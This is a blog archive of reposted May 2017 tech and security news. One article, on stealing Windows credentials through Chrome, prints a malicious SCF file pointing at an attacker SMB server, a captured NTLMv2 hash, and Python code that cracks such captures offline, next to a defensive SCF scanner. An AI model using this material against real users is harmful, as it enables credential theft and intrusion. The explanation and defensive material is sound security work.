Monthly Archives: May 2017

Watts is a huge battery that powers your home

Like Tesla’s Powerwall, Watts is a big battery that can power your home. One Watts cell can support a few small appliances including computers and refrigerators and a few units can power TVs and electric washers. The units can charge via the grid or with solar panels and the Watts units include an app that shows discharge and battery remaining.

The batteries, which were designed in Russia, are stackable, so you can add as many or as few units to your power network as you need. They can also send energy back to the grid when required. Each unit delivers 1.5 kW continuous (3 kW peak) and stores 1.2 kWh.

The company is shipping batteries in August, and one unit costs $2,999. They aim to be the LEGO of high-end home batteries, letting you add real power storage to your home, office, or zombie-proof bunker.

via: techcrunch

reVIVE is a VR solution for diagnosing ADHD built by high school students

The first team to go onstage at the Disrupt NY 2017 Hackathon showed off reVIVE, a virtual reality tool for diagnosing ADHD. The team of three high school juniors wanted to simplify the lengthy and expensive process of diagnosing the condition.

The team tells me that ADHD normally takes six to nine months to diagnose, and that process alone can cost patients thousands of dollars.

The reVIVE tool is composed of three tests that gauge the user’s motor skills, sustained concentration and reaction time. Users are asked to perform tasks like navigating a maze, touching objects as they light up in a particular color, and standing still within a defined space. The team created a scoring system that lets medical professionals get a clearer picture of a patient’s situation within minutes.

Check out this video:

https://videos.vidible.tv/prod/2017-05/14/591878b8e0fa173c33a9a851_640x360_v1.mp4?6So8hqrOWSsiVtErp9rL3Djq7_jSSheSWCEVSk_9dEG3tY7H_AFGEJxaKskXeGg-

Akshaya Dinesh, 17; Sowmya Patapati, 16; and Amulya Balakrishnan, 17, built the virtual reality app for the HTC Vive using Unity. The team of New Jersey high school students met and became friends at the hackathon. Balakrishnan and Patapati work with the organization #BUILTBYGIRLS.

“We really wanted to quantify ADHD diagnoses,” said Dinesh. “When you’re immersed in a 360 environment, patients experience the environment as if they’re really there.”

The team isn’t trying to replace the role of therapists when it comes to treatment, but they believe that the app can serve as a telemedicine tool, alerting a user’s therapist to their latest performance inside the app, while analyzing the data over time thanks to IBM Watson.

Medical diagnosis and treatment have already proven to be a major use case for virtual reality. Companies like MindMaze have reached unicorn status by selling VR solutions directly to medical professionals. The team believes that diagnosing illnesses is one of “the best use cases possible for VR.”

via: techcrunch

Test-approved app could kill off the graphing calculator

Students can kiss $150 calculators goodbye.

Math students have a love-hate relationship with the funky, expensive TI-84 graphing calculators, but thanks to a new deal, they’ll soon get a free option. Starting this spring, pupils in 14 US states will be able to use the TI-like Desmos online calculator during standardized testing run by the Smarter Balanced consortium. “We think students shouldn’t have to buy this old, underpowered device anymore,” Desmos CEO Eli Luberoff told Quartz.

The Desmos calculator will be embedded directly into the assessments, meaning students will have access during tests with no need for an external device. It’ll also be available to students in grades 6 through 8 and high school throughout the year. The calculator is free to use, and the company makes money by charging organizations to use it, according to Bloomberg.

The Desmos calculator is more advanced than the TI-84 or other devices, offering a friendlier interface, live graphing updates, and free access via a smartphone, tablet or any other connected device. Thanks to an earlier deal with Smarter Balanced, it also provides accessibility features for the blind and visually impaired. It’s used by students in 146 countries and racks up over 300,000 hours of use per month, the company says.

Not cheap: a Texas Instruments TI-84 graphing calculator on a display rack (Getty Images)

TI has monopolized the graphing calculator market for years, but Desmos has made rapid inroads since it launched its calculator app in 2011. It’s backed by the world’s largest education company, Pearson PLC, which uses it for its enVision high-school math program. It’s also supported by SAT exam administrator The College Board, which endorses it for drills, practice exams and curriculum assessments.

There are lots of online graphing calculators available, but educators are reluctant to allow them during tests. “Our products include only the features that students need in the classroom, without the many distractions or test security concerns that come with smartphones, tablets and internet access,” Texas Instruments’ Peter Balyta told Bloomberg.

However, the Desmos and Smarter Balanced deal addresses that concern by embedding the calculator directly into the test, so students get the calculator without any other outside access. That means students can use the calculator app while studying and have the same tool during tests, without spending a bundle on a TI-84 or other calculator. The need for pricey calculators is “a huge source of inequity, and it’s just not the best way to learn,” says Luberoff.

via: engadget

Nintendo is planning a Legend of Zelda mobile game

Following the massive success of Pokémon GO and the, well, slightly less massive success of Super Mario Run, Nintendo is reportedly planning a Legend of Zelda game for smartphones for release later this year, or so The Wall Street Journal’s sources have it.

Details beyond that are scarce; it would supposedly follow the release of the also-rumored Animal Crossing mobile game, presumably once everyone has played that into the ground.

How exactly they expect to represent the expansive exploring, puzzling and battling that have defined the series heretofore is unclear. Super Mario Run took a minimalist approach to controls, essentially reducing the platformer to a one-button game.

That would be rather difficult with the vastly more complex Zelda series — doubly so considering the improbably well-received Breath of the Wild was so vast and unrestricted. Whether the company would repeat its pricing strategy for Mario is also unknown; sales weren’t quite what it had hoped.

We’ll likely know more soon; Super Mario Run was announced three months ahead of its release. But if the timing hinted at by the WSJ’s sources is correct, we’ll hear about the Animal Crossing game first, though who knows when.

via: techcrunch

Beware! Hackers Can Steal Your Windows Password Remotely Using Chrome

A security researcher has found a serious weakness in the default configuration of the latest Google Chrome running on any version of Windows, including Windows 10, that lets a remote attacker steal a user’s Windows login credentials.


Bosko Stankovic of DefenseCode found that merely visiting a website that serves a malicious SCF file can make victims unknowingly hand their computer’s login credentials to an attacker, through Chrome and the SMB protocol.


The underlying technique is not new. Stuxnet, the malware built to sabotage Iran’s nuclear program, used Windows shortcut (LNK) files to compromise systems.

What makes this attack different is that such SMB authentication attacks have now been publicly demonstrated against Google Chrome for the first time, after Internet Explorer (IE) and Edge.

Chrome + SCF + SMB = Stealing Windows Credentials

The SCF (Shell Command File) format works much like LNK files: it supports a limited set of Windows Explorer commands and defines an icon for desktop items such as My Computer and the Recycle Bin.

“Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials,” Stankovic wrote in a blog post, describing the flaw.

An SCF file is a plain-text file with a short INI-like syntax that names the Explorer command to run and the file (and icon index) from which Explorer loads the icon:

[Shell]
Command=2
IconFile=explorer.exe,3

Because Chrome does not treat SCF files as dangerous, an attacker can lure the victim to a website that serves a maliciously crafted shortcut file, which Chrome downloads automatically to the default download folder without asking the user for confirmation.

As soon as the user opens the folder containing the downloaded file, immediately or later, Windows Explorer processes the file to render its icon, without the user clicking on it.


But instead of pointing at a local icon image, the attacker’s SCF file points at a remote SMB server under the attacker’s control:

[Shell]
IconFile=\\170.170.170.170\icon

When Explorer tries to fetch that icon, Windows automatically authenticates to the attacker’s server over SMB, handing over the victim’s username, domain and an NTLMv2 challenge/response derived from the password hash. The attacker can crack that response offline to recover the password and then use the credentials against the victim’s own computer or network resources.

“Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares,” Stankovic said.


But following the Stuxnet attacks, Microsoft restricted LNK files to loading their icons from local resources only, so they can no longer be abused to fetch icons from remote servers.


However, SCF files were left alone.

Exploiting LM/NTLM Hash Authentication via SCF File (diagram; image source: SANS)

But why would your Windows PC automatically hand over your credentials to the server?

That is simply how authentication over the Server Message Block (SMB) protocol works in combination with the NTLM challenge/response mechanism. In short, LM/NTLM authentication works in four steps:

  • The Windows client attempts to connect to a server.
  • The server responds with a random challenge value and asks the client to prove it knows the password by computing a response over that challenge with the password hash.
  • The client sends back its username, domain and the computed response (for NTLMv2, an HMAC keyed with the password hash over the server challenge and a client-supplied blob). The password hash itself never leaves the client.
  • The server (or the domain controller) computes the expected response from its own copy of the password hash and grants access if the two match.

In the SCF attack scenario described by Stankovic, Windows performs step 3 against the attacker’s SMB server automatically, handing over the victim’s username and NTLMv2 response. If the user is part of a corporate network, these are the domain credentials assigned by the company’s sysadmin; if the victim is a home user, they are the credentials of the local Windows account (or of the Microsoft account used to log in to Windows).

 

[*] SMB Captured – 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 – 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

The capture does not contain the password itself, only a challenge/response derived from its hash, but that response can be attacked offline with a dictionary or brute force to recover the plaintext password. The second block above is the same capture in the user::domain:server-challenge:response:blob form that password-cracking tools accept.
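To make the offline attack concrete, the following Python is an added example written for this page, not code from DefenseCode or The Hacker News. It reproduces the NTLMv2 computation the client performs in step 3 above and runs a dictionary attack against a capture line in the same user::domain:challenge:response:blob form as the one shown. The user name alice, domain CORP, password, wordlist, timestamp and client nonce are constructed for the example; the server challenge reuses the 1122334455667788 value from the capture above. MD4 is implemented inline because hashlib.new("md4") is unavailable on OpenSSL 3 builds.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, implemented inline because hashlib.new("md4") is missing
    on OpenSSL 3 builds. The NT hash is MD4 of the UTF-16LE password."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(48):
            if i < 16:      # round 1
                fn, k, s, add = f, i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:    # round 2
                fn, k, s, add = g, (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
            else:           # round 3
                fn, k, s, add = h, r3_order[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, _lrot((a + fn(b, c, d) + x[k] + add) & 0xFFFFFFFF, s), b, c
        a0, b0 = (a0 + a) & 0xFFFFFFFF, (b0 + b) & 0xFFFFFFFF
        c0, d0 = (c0 + c) & 0xFFFFFFFF, (d0 + d) & 0xFFFFFFFF
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NT hash (NTOWFv1): unsalted MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16le"))


def ntlmv2_response(password: str, user: str, domain: str,
                    server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr as the client computes it in step 3: the user name is
    upper-cased, the domain is used as sent, and the password hash acts
    only as an HMAC key, so it never crosses the wire."""
    ntlmv2_key = hmac.new(nt_hash(password),
                          (user.upper() + domain).encode("utf-16le"),
                          hashlib.md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, hashlib.md5).digest()


def parse_capture(line: str) -> dict:
    """Split a user::domain:challenge:response:blob capture line into fields."""
    user, _, domain, challenge, response, blob = line.strip().split(":")
    return {"user": user, "domain": domain,
            "challenge": bytes.fromhex(challenge),
            "response": bytes.fromhex(response),
            "blob": bytes.fromhex(blob)}


def crack_ntlmv2(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the response for every candidate
    and compare it with the captured one. Returns the password or None."""
    c = parse_capture(line)
    for candidate in wordlist:
        guess = ntlmv2_response(candidate, c["user"], c["domain"],
                                c["challenge"], c["blob"])
        if hmac.compare_digest(guess, c["response"]):
            return candidate
    return None


# Constructed sample (not the capture from the article). The blob follows the
# NTLMv2 client-challenge layout: version bytes, reserved, FILETIME, 8-byte
# client nonce, reserved, AV pairs (here just the end marker), reserved.
_SAMPLE_BLOB = (bytes.fromhex("0101000000000000")
                + struct.pack("<Q", 131392800000000000)   # FILETIME, constructed
                + bytes.fromhex("a1b2c3d4e5f60718")       # client nonce, constructed
                + bytes(4) + bytes(4) + bytes(4))
_SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")     # challenge seen in the article's capture
_SAMPLE_PASSWORD = "Summer2017!"                          # constructed


def make_sample_line(user: str = "alice", domain: str = "CORP",
                     password: str = _SAMPLE_PASSWORD) -> str:
    """Build the capture line a rogue SMB server would log for the constructed
    user, so the cracker can be exercised without a real victim."""
    resp = ntlmv2_response(password, user, domain, _SAMPLE_CHALLENGE, _SAMPLE_BLOB)
    return f"{user}::{domain}:{_SAMPLE_CHALLENGE.hex()}:{resp.hex()}:{_SAMPLE_BLOB.hex()}"


if __name__ == "__main__":
    line = make_sample_line()
    print(line)
    print("cracked:", crack_ntlmv2(line, ["letmein", "Password1", "Summer2017!", "qwerty"]))
```

Run stand-alone it prints the constructed capture line and the recovered password. Note what the attacker actually receives: not the hash but an HMAC over the challenge, so each guess costs one MD4 plus two HMAC-MD5 operations and nothing else, which is why a long random password, rather than a clever one, is what makes this capture useless once egress to port 445 has been allowed.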

“It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings,” the researcher said. “Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files.”
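A defender-side check, added here as an example and not part of the DefenseCode research or the article: a small Python scanner that parses the [Shell] section of SCF files in the form shown above, flags an IconFile pointing at a UNC path (the \\host\share form the attack relies on), and flags double-extension names like picture.jpg.scf that Explorer displays as picture.jpg. The two sample bodies reuse the SCF snippets from above under constructed file names; scan_directory is a hypothetical entry point for sweeping a downloads folder.

```python
import os
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional, Tuple

# A UNC icon path: \\host\share\icon (Windows also accepts forward slashes).
_UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)(?:[\\/]|$)")


@dataclass
class ScfFinding:
    filename: str
    icon_file: Optional[str]
    remote_host: Optional[str]      # host named in a UNC IconFile, if any
    disguised: bool                 # e.g. picture.jpg.scf, shown as picture.jpg
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-like SCF body into {section: {key: value}}.
    Section and key names are case-insensitive in Windows, so they are lowered."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def analyze_scf(filename: str, text: str) -> ScfFinding:
    """Flag SCF files whose icon would trigger outbound SMB authentication,
    and names that hide the .scf extension behind another one."""
    icon = parse_scf(text).get("shell", {}).get("iconfile")
    finding = ScfFinding(filename=filename, icon_file=icon, remote_host=None, disguised=False)

    if icon:
        # IconFile may carry an icon index after a comma: explorer.exe,3
        path = icon.rsplit(",", 1)[0].strip().strip('"')
        m = _UNC_RE.match(path)
        if m:
            finding.remote_host = m.group(1)
            finding.reasons.append(f"IconFile points at remote host {m.group(1)}")

    base = os.path.basename(filename).lower()
    if base.endswith(".scf") and "." in base[:-4]:
        finding.disguised = True
        finding.reasons.append("double extension hides .scf in Explorer")
    return finding


def scan(files: Iterable[Tuple[str, str]]) -> List[ScfFinding]:
    """Run analyze_scf over (filename, content) pairs and return only the hits."""
    return [f for f in (analyze_scf(n, t) for n, t in files) if f.suspicious]


def scan_directory(root: str) -> List[ScfFinding]:
    """Walk a folder (e.g. a user's Downloads) and scan every *.scf file in it."""
    found = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".scf"):
                full = os.path.join(dirpath, name)
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    found.append((full, fh.read()))
    return scan(found)


# Constructed samples: the benign body is the stock "Show Desktop" SCF,
# the malicious body is the one from the write-up above.
BENIGN_SCF = "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n[Taskbar]\nCommand=ToggleDesktop\n"
MALICIOUS_SCF = "[Shell]\nIconFile=\\\\170.170.170.170\\icon\n"

if __name__ == "__main__":
    for hit in scan([("Show Desktop.scf", BENIGN_SCF), ("picture.jpg.scf", MALICIOUS_SCF)]):
        print(hit.filename, "->", "; ".join(hit.reasons))
```

Point scan_directory at a Downloads folder, or feed scan the (name, content) pairs from a mail gateway or EDR; a hit with remote_host set is precisely the file that will make Windows authenticate outbound over SMB the moment Explorer renders the folder, so it should be quarantined before the folder is ever opened.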

No Need to Crack the Password *Sometimes*

Cracking is not always needed. An attacker who is online while the victim authenticates can relay the NTLM authentication to another server that accepts the same credentials, such as a file share the victim has access to, without ever learning the password. And because Windows lets users log in with a Microsoft account, the captured credential may belong to that account; once the password is recovered it also opens the victim’s OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and other Microsoft services.

According to the researcher, such weaknesses pose a serious threat to large organizations: an attacker who can impersonate one employee can immediately reuse that access to escalate privileges, gain control of IT resources and attack other members of the organization.

How to Prevent Such SMB Authentication Attacks

The simplest defence is to block outbound SMB connections (TCP ports 139 and 445) from the local network to the Internet at the perimeter firewall, so that local computers cannot reach remote SMB servers. Stankovic also advises users to disable automatic downloads in Google Chrome: go to Settings → Show advanced settings and tick “Ask where to save each file before downloading”. You then approve each download manually, which significantly reduces the risk of credential theft via SCF files.

Google is aware of the issue and is said to be working on a fix, but has given no timeframe for when it will reach users.

via: thehackernews

Bell Canada Hacked: Data of 1.9 Million Customers Stolen

While everyone was busy with the WannaCry ransomware menace, two separate data breaches were reported: one at DocuSign, a major provider of electronic signature technology, and another at Bell, Canada’s largest telecommunications company.

Canadian mobile phone, TV and internet service provider Bell confirmed on Monday that an unknown hacker had illegally accessed its customer information.


In a brief statement, Bell Canada said an unknown hacker had obtained data on millions of Bell customers. The company did not say which particular service the stolen customer details were pulled from.


The company said email addresses, names and telephone numbers of its customers had been accessed in the breach.

How Many Victims Were Affected?

Bell confirmed the hack and said the unknown hacker has managed to gain access to information on nearly 2 million customers.

“The illegally accessed information contains approximately 1.9 million active email addresses and approximately 1,700 names and active phone numbers,” the company said.

However, Bell assured its customers that there’s no indication of hacker’s access to “financial, password or other sensitive personal information,” and that the incident is not linked to the global WannaCry ransomware attacks.

What’s the Missing Link?

The incident seems to be an extortion attempt by a hacker or group of hackers who posted some of the stolen data of Bell Canada customers online and threatened to leak more data if the company fails to cooperate.

“We are releasing a significant portion of Bell.ca’s data due to the fact that they have failed to [co-operate] with us,” reads a post on PasteBin published Monday afternoon, several hours before Bell Canada released its apology.

“This shows how Bell doesn’t care for its [customers’] safety and they could have avoided this public announcement… Bell, if you don’t [co-operate], more will leak :).”

There is still no explanation of who is behind the extortion demand or what sort of cooperation the hackers were seeking, but it appears Bell Canada refused to pay.


However, this information remains unconfirmed.

What is Bell Canada doing? Canada’s largest telecom said it is working with Canadian law enforcement to find out who was responsible for the attack.

“We apologize to Bell customers for this situation and are contacting those affected directly,” the company said.

“Bell took immediate steps to secure affected systems. The company has been working closely with the RCMP cyber crime unit in its investigation and has informed the Office of the Privacy Commissioner.”

What should Bell Canada customers do?

While Bell Canada believes there is “minimal risk involved for those affected” by the attack, access to customer names, email addresses and telephone numbers opens the door to targeted phishing.

Users should therefore be particularly alert to phishing emails, which are usually cyber criminals’ next step after a breach and are designed to trick users into giving up further details such as financial information.

As a precaution, Bell Canada customers should also change their passwords as soon as possible.

via: thehackernews

Over 200 Brooks Brothers Stores Hit by Payment Card Breach

U.S. clothing retailer Brooks Brothers, which operates more than 400 stores worldwide, informed customers last week that cybercriminals had access to its payment processing systems for nearly one year.

According to the company, attackers installed malware designed to capture payment card data at many of its retail and outlet locations. While the organization does not store card data, the malware intercepted information as it passed through its systems.

Customers who made purchases at certain Brooks Brothers locations in the U.S. and Puerto Rico between April 4, 2016, and March 1, 2017, may have had their payment card information stolen. The exposed information includes names, credit and debit card numbers, card expiration dates, and verification codes. However, not all transactions were affected.

The retailer pointed out that Social Security numbers and other personally identifiable information were not compromised in the breach. It also noted that online transactions were not at risk, and Brooks Brothers airport locations were not impacted.

Brooks Brothers has set up a web page that lists all the impacted locations in each state. More than 220 stores are listed, with a majority in California, Florida, Massachusetts, New Jersey, New York, North Carolina, Pennsylvania and Texas.

The company is confident that the malware has been removed from its systems. Law enforcement has been alerted and experts have been called in to investigate the incident and assist with remediation efforts.

Brooks Brothers has provided some advice on what potentially affected customers can do to protect themselves against payment card fraud, but pointed out that it cannot be certain whether any particular individual is affected, which is why it will not call or email anyone regarding the breach. It’s not uncommon for scammers to take advantage of such incidents to trick people into handing over personal and financial information.

Customers who have concerns or questions can call 888-735-5927 between 9:00 AM and 9:00 PM ET, Monday through Friday.

Brooks Brothers is not the only major clothing retailer to suffer a data breach recently. Last year, Eddie Bauer informed customers that its payment processing systems had been infected with malware for more than six months.

via: securityweek

NSA tools behind worldwide WanaCryptOr ransomware attack

A ransomware attack leveraging alleged NSA hacking tools that began hitting the U.K. National Health Service earlier today has spread globally, impacting FedEx and Spanish telecom Telefónica and locking up tens of thousands of computers in 74 countries.

Early analysis found that the attackers dropped the WanaCryptOr 2.0 ransomware using an exploit released last month by the Shadow Brokers hacking group. The ransomware, also known as WannaCry, displays a ransom note demanding $300 in Bitcoin, to be paid within three days. The most widely hit countries so far are the Russian Federation, Ukraine, India and Taiwan, according to Kaspersky Lab. About 60,000 computers in total are infected.

The attacker has not yet been named, but a 22-year-old independent cybersecurity researcher who tweets as @MalwareTechBlog and blogs at MalwareTech is being credited with helping mitigate the attack on Friday. He discovered that, once on a target computer, the malware tried to contact a specific website before doing anything else, the Telegraph reported. If the computer could not reach that website, the ransomware activated and took the machine hostage; if it could, the malware simply exited without installing the ransomware.

The researcher used this to his advantage. The domain was available to register, so he bought it for a small sum; as soon as it went live, newly infected computers could reach it and shut themselves down, effectively switching off the attack.

“A few seconds after the domain had gone live I received a DM from a Talos analyst asking for the sample I had which was scanning SMB host, which I provided. Humorously at this point we had unknowingly killed the malware so there was much confusion as to why he could not run the exact same sample I just ran and get any results at all,” he wrote.

However, before the researcher was able to enact his plan the ransomware had spread globally.

“The ransomware is spread using a known, and patched, vulnerability (MS17-010) that came from a leaked NSA set of exploits that we reported on our blog in April. Our research shows the encryption is done with RSA-2048 encryption. That means that decryption will be next to impossible, unless the coders have made a mistake that we haven’t found yet,” wrote Malwarebytes researcher Pieter Arntz.

Courtesy of Malwarebytes

MS17-010 is the Microsoft security update, released in March, that patches the SMB flaw exploited by ETERNALBLUE; the exploit is used to plant the DoublePulsar backdoor, according to Cyberscoop, and the attackers then use that backdoor to infect the machine with WanaCryptOr.

The initial entry into a company is most likely through a phishing attack.

“It would be shocking if the NSA knew about this vulnerability, but failed to disclose it to Microsoft until after it was stolen. It is past time for Congress to enhance cybersecurity by passing a law that requires the government to disclose vulnerabilities to companies in a timely manner. Patching security holes immediately, not stockpiling them, is the best way to make everyone’s digital life safer,” said Patrick Toomey, a staff attorney with the American Civil Liberties Union’s National Security Project.

“The speed with which it’s spreading is frightening. Ransomware becomes a significant nuisance if full backups of the systems weren’t taken, dramatically increasing the recovery time if the ransom isn’t paid,” said Gavin Millard, Tenable EMEA technical director.

The scattershot nature of the attack has also raised eyebrows with it hitting a variety of industries and countries.

“This kind of attack is indiscriminate in its nature, it will attack any machine that is not patched for the particular vulnerability, in this case MS17-010, that it is exploiting. This appears to be financially motivated, however that doesn’t mean that there aren’t other potential scenarios,” Owen Connelly, VP services at IOActive, told SC Media.

Phil Richards, CISO at Ivanti, called the attack’s persistence strong: infected systems, at least those that do not pay the ransom, have to be powered down and rebuilt from scratch, and all backups have to be pulled off the network so they do not become ensnared.

“It isn’t surprising that NHS haven’t gotten to root cause yet. Since 90% of this type of ransomware comes in through phishing, my assumption went with the numbers. This ransomware enumerates accounts and systems when it infects a machine, so spreading to servers is also expected. Servers are more consistently available on the network than workstations. So far, this appears to be a Windows only ransomware, not affecting Linux or Mac.”

Because the attack is taking advantage of an already patched vulnerability some experts are calling it a failure on behalf of the victims to have left their systems unpatched.

“This is an example of the systemic failure of government and commercial firms to implement security, resiliency and appropriate privacy policies,” said Philip Lieberman, president of Lieberman Software.

John Bambenek, threat research manager at Fidelis Cybersecurity, said that the WannaCry attack demonstrates the serious consequences that can occur when a nation-state’s zero-day exploit is leaked into the wild, even after a patch is developed. “This is the first time that a worm-like tool has been used in conjunction with ransomware that has created devastating impact against entire organizations,” said Bambenek. “Strong and swift patching would have helped mitigate this threat. It has undoubtedly captured the imagination of criminals who don’t want to hold individual machines ransom but to take entire organizations hostage and surely we will see much more of this in the coming weeks.”

via: scmagazine

DocuSign confirms customer emails were stolen and used in phishing campaign

DocuSign, the owner of eSignature, one of the most popular digital signature services, said today that a database of customer emails was breached and used in a phishing campaign that began last week.

The phishing emails were designed to look like they were sent by DocuSign and had subject lines that said “Completed: [domain name] – Wire transfer for recipient-name Document Ready for Signature” or “Completed [domain name/email address] – Accounting Invoice [Number] Document Ready for Signature.” Word Document attachments in the emails installed malware if opened.

The company began tracking the phishing campaign on its security site on May 9, though it was not until today that it confirmed its email list had been stolen.

In today’s post, DocuSign said its eSignature service, envelopes and customer documents remain secure, but that hackers were able to access customer emails through a “non-core” system that the company uses to send service-related announcements. DocuSign added that only emails were stolen and other sensitive information, including names, physical addresses, passwords, social security numbers, credit card data and documents sent through the eSignature system, were not accessed.

DocuSign said it has put more security measures in place and contacted law enforcement agencies. It listed several steps customers should take to protect themselves, including forwarding suspicious emails to spam@docusign.com before deleting them, updating anti-virus software and reading DocuSign’s white paper on phishing.

via: techcrunch

Signs That You’re About to Suffer a Security Breach

Do you ever get those thoughts in the back of your mind that somehow, at some point, your organization is going to experience a security breach? I know that’s the kind of thing that keeps chief information security officers (CISOs) and other security leaders up at night. The thing is, most of these thoughts are just that: thoughts.

Thoughts, in and of themselves, really mean nothing when it comes to security incidents and breaches. After all, how could something that’s intangible and often rooted in stress manifest as a tangible outcome that puts you in the headlines and leads to that dreaded toxic CV?

Go With Your Gut

I think we’ve all had those feelings deep down in the pits of our stomachs that something’s going on and weird things are about to happen. But none of these thoughts really matter at the end of the day when you have gaping holes in your information security program.

Looking at things from a broader perspective, here are some common mistakes I have observed in my work performing security assessments and consulting that can directly impact your organization’s security posture.

Your business may be at risk of a security breach if:

  • You have failed to get all the right people in executive management, legal, HR and other departments on board with your security initiatives.
  • You don’t fully understand your true risk posture. Maybe you are performing ongoing risk assessments, but you’re not looking at all the areas that matter. Perhaps you’re not using the right tools, or maybe you’re taking the wrong approaches. Whatever it is, you still haven’t uncovered the risks lurking in your environment.
  • You have well-documented policies with no true substance backing them up in terms of technical controls and business processes.
  • You have failed to connect with your user base in terms of security. Your culture remains one of IT against everyone else, or IT is placed on the back burner until an incident occurs.
  • You lack an incident response plan that includes investigative and recovery procedures as well as contact information for outside parties that you’ll need to call for assistance.
  • You’re not invited to legal, audit or enterprise risk meetings that involve the security initiatives you’re managing.

You know the saying: When the going gets tough, the tough get going. Is your security program going to hold up to that? Can you rely on your people, technologies and processes to absorb whatever negative impacts come your way?

How to Stop a Security Breach in Its Tracks

I think most people believe their information security programs are better than they really are — it’s human nature. It’s up to you, as the information security leader, to play devil’s advocate. Don’t be ashamed to ask tough questions or reveal the ugly parts of your program. After all, acknowledgment and diagnosis account for more than half of what it takes to build a strong information security program.

Right now, the odds are probably not in your favor when it comes to detecting and preventing security breaches. Make the decision to change that. Things are only going to become more complicated in your organization. Security holes that are plugged and processes that are built out starting today will bolster your security program for years to come.

via: securityintelligence